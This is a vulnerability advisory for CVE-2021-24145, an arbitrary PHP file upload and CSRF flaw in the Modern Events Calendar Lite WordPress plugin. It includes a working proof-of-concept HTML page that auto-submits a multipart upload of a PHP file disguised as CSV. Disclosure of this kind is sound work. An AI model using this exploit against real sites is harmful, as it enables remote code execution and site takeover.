Modern Events Calendar Lite < 5.16.5 – Authenticated Arbitrary File Upload leading to RCE | CVE 2021-24145

Description

The plugin did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. The issue could also be exploited via a CRSF attack, as such check was also missing.

Proof of Concept

https://drive.google.com/file/d/1qQfqnQOObBOmCFTTw1uGYmwxWe6uljhb/view?usp=sharing

<html>
  <body onload="submitRequest();">
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=MEC-ix&tab=MEC-import", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------132370916641787807752589698875");
        xhr.withCredentials = true;
        var body = "-----------------------------132370916641787807752589698875\r\n" + 
          "Content-Disposition: form-data; name=\"feed\"; filename=\"aa.php\"\r\n" + 
          "Content-Type: text/csv\r\n" + 
          "\r\n" + 
          "\x3c?php echo \'FAILED\'; ?\x3e\n" + 
          "\r\n" + 
          "-----------------------------132370916641787807752589698875\r\n" + 
          "Content-Disposition: form-data; name=\"mec-ix-action\"\r\n" + 
          "\r\n" + 
          "import-start-bookings\r\n" + 
          "-----------------------------132370916641787807752589698875--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
  </body>
</html>


Uploaded file will be at /wp-content/uploads/aa.php